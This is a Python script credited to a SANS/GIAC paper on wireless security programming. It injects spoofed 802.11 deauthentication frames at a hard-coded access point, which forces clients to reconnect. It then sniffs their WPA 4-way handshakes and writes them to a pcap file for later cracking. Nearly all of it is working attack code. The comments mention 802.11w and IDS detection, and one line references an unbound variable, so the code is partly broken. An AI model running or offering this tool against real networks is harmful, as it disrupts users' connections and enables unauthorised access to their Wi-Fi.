#!/usr/bin/env python
########################################
#
# This code is part of the SANS/GIAC Gold Paper titled
#
# Programming Wireless Security
#
# by Robin Wood (dninja@gmail.com), accepted May 2008
#
# For more information you can find the paper in the "Wireless Access" section of the
# SANS Reading Room at http://www.sans.org/reading_room/ or at www.digininja.org
#
########################################
import sys
from scapy import *
import pylorcon
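interface = "ath0"
# interface = sys.argv[1]   # alternative: take the interface name from the command line
eapol_packets = []          # not referenced elsewhere in this listing; kept for compatibility
handshake_found = 0         # set to 1 by sniffEAPOL once a full handshake has been written out

# Injection (pylorcon) and capture (scapy's sniff) both use the same radio.
# Use the single `interface` name here instead of repeating the literal
# "ath0", so changing the interface (or switching to the argv form above)
# takes effect on both paths.  Driver name "madwifing" is as in the original.
injector = pylorcon.Lorcon(interface, "madwifing")
injector.setfunctionalmode("INJECT")
injector.setmode("MONITOR")
injector.setchannel(11)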
destination_addr = '\xff\xff\xff\xff\xff\xff'  # i.e. broadcast
bss_id_addr = '\x00\x0e\xa6\xce\xe2\x28'
source_addr = bss_id_addr  # The AP is sending the deauth

# Raw 802.11 deauthentication frame, assembled once and reused by deauth():
# frame control + duration, the three address fields (receiver, transmitter,
# BSSID), sequence control, then the two-byte reason code that forms the body.
# Because the frame is built once and retransmitted verbatim, every copy
# carries the same sequence-control value -- a fixed sequence number is one
# of the signals a wireless IDS uses to flag spoofed management frames.
# Such frames carry no integrity protection unless the network deploys
# 802.11w (management frame protection), which is the mitigation here.
packet = "".join([
    "\xc0\x00\x3a\x01",   # frame control (management / deauthentication), duration
    destination_addr,     # addr1: receiver
    source_addr,          # addr2: transmitter
    bss_id_addr,          # addr3: BSSID
    "\x80\xcb\x07\x00",   # sequence control, reason code
])
def deauth(packet_count):
    """Transmit the pre-built deauthentication frame `packet_count` times.

    Relies on the module-level `injector` (pylorcon handle) and `packet`
    (the raw 802.11 deauthentication frame built above).  Returns nothing;
    every `injector.txpacket` call is a side effect on the radio.  A
    non-positive count sends nothing.
    """
    for _ in range(packet_count):
        injector.txpacket(packet)
# NOTE(review): `mac` is never bound before this line, so evaluating it at
# module level raises NameError on import.  The expression itself
# normalises a colon-separated MAC string (zero-pads each octet, lower-cases
# the result); it reads like the body of a small helper whose `def` line was
# lost in extraction -- confirm against the paper's original listing before
# relying on it.
mac = ":".join([i.zfill(2) for i in mac.split(":")]).lower()
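def _mac_str(raw):
    """Render a six-byte raw MAC address as lower-case "xx:xx:xx:xx:xx:xx".

    scapy presents Dot11 address fields in this string form, so this is the
    form the raw `bss_id_addr` bytes must be converted to before comparison.
    """
    return ":".join("%02x" % ord(c) for c in raw)


def _peer_station(p):
    """Return the station address of an infrastructure frame, or None.

    Decided from the To-DS (bit 0) and From-DS (bit 1) flags of the
    frame-control field, tested in that order exactly as the original code
    did (so a frame with both bits set takes the To-DS branch):
      To-DS set   -> sent by the STA, addr2 is the STA
      From-DS set -> sent by the AP, addr1 is the STA
      neither     -> not an AP<->STA frame (e.g. ad-hoc): None
    """
    if p.FCfield & 1:
        # From DS = 0, To DS = 1: frame from the STA, addr2 = transmitter
        return p.addr2
    if p.FCfield & 2:
        # From DS = 1, To DS = 0: frame from the AP, addr1 = receiver
        return p.addr1
    return None


def sniffEAPOL(p):
    """scapy `prn` callback that watches for a complete WPA 4-way handshake.

    Frames without a WPA_key (EAPOL-Key) layer, or whose BSSID (addr3) is
    not the module-level `bss_id_addr`, are ignored.  For every station the
    module-level `tracking` dict records which of handshake messages 2, 3
    and 4 have been seen, classified from the Key MIC / Key Ack / Install
    bits of `key_info`, the key-data length and the replay counter.  When
    all three are present the stored frames are written to /var/gold/a.pcap,
    `handshake_found` is set and the process exits with status 0.

    Two defects in the original are corrected here: the BSSID test compared
    scapy's "xx:xx:..." string against six raw bytes (never equal), and the
    flag tests were written `key_info & FLAG == 0`, which Python parses as
    `key_info & (FLAG == 0)` because `==` binds tighter than `&` -- so the
    message-2 and message-4 branches could never be taken.

    Args:
        p: a scapy packet as delivered by `sniff`.

    Side effects: mutates `tracking` and `handshake_found`, prints progress
    to stdout, may call `wrpcap` and `sys.exit(0)`.
    """
    global handshake_found

    if not p.haslayer(WPA_key):
        return
    layer = p.getlayer(WPA_key)

    # First, check that the access point is the one we want to target.
    # Compare in scapy's string form; a raw `AP == bss_id_addr` test on the
    # six-byte literal can never be true.
    AP = p.addr3
    if AP is None or AP.lower() != _mac_str(bss_id_addr):
        print AP
        print "not ours\n"
        return

    STA = _peer_station(p)
    if STA is None:
        # either ad-hoc or otherwise not an AP<->STA exchange
        return

    state = tracking.setdefault(STA, {
        'frame2': None,
        'frame3': None,
        'frame4': None,
        'replay_counter': None,
        'packets': [],
    })

    key_info = layer.key_info
    wpa_key_length = layer.wpa_key_length
    replay_counter = layer.replay_counter

    # Key Information flag bits of the EAPOL-Key frame.
    WPA_KEY_INFO_INSTALL = 64
    WPA_KEY_INFO_ACK = 128
    WPA_KEY_INFO_MIC = 256
    mic = bool(key_info & WPA_KEY_INFO_MIC)
    ack = bool(key_info & WPA_KEY_INFO_ACK)
    install = bool(key_info & WPA_KEY_INFO_INSTALL)

    # Messages 2 and 4 carry the same flag bits (MIC set, Ack and Install
    # clear); message 2 is told apart by its non-empty key-data field, so
    # that test must stay in the first branch.  Message 4 is accepted only
    # when its replay counter echoes the one stored from message 3.
    if mic and not ack and not install and wpa_key_length > 0:
        # check for frame 2
        print "Found packet 2 for ", STA
        state['frame2'] = 1
        state['packets'].append(p)
    elif mic and ack and install:
        # check for frame 3
        print "Found packet 3 for ", STA
        state['frame3'] = 1
        # store the replay counter for this STA
        state['replay_counter'] = replay_counter
        state['packets'].append(p)
    elif mic and not ack and not install and state['replay_counter'] == replay_counter:
        # check for frame 4
        print "Found packet 4 for ", STA
        state['frame4'] = 1
        state['packets'].append(p)

    if state['frame2'] and state['frame3'] and state['frame4']:
        print "Handshake Found\n\n"
        wrpcap("/var/gold/a.pcap", state['packets'])
        handshake_found = 1
        sys.exit(0)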
tracking = {}

# Up to nine rounds: send a burst of deauthentication frames, then listen
# for the stations' re-association handshakes.  sniffEAPOL exits the process
# itself as soon as a complete handshake has been written out, so falling
# out of the loop means every round came up empty; `handshake_found` is set
# by the callback but never needs to be consulted here for that reason.
for attempt in range(1, 10):
    print "About to deauth\n\n"
    deauth(50)
    print "Deauth done, sniffing for EAPOL traffic"
    # reset the tracking between each sniffing attempt
    tracking = {}
    sniff(iface=interface, prn=sniffEAPOL, count=1000, timeout=30)

print "No handshake found\n\n"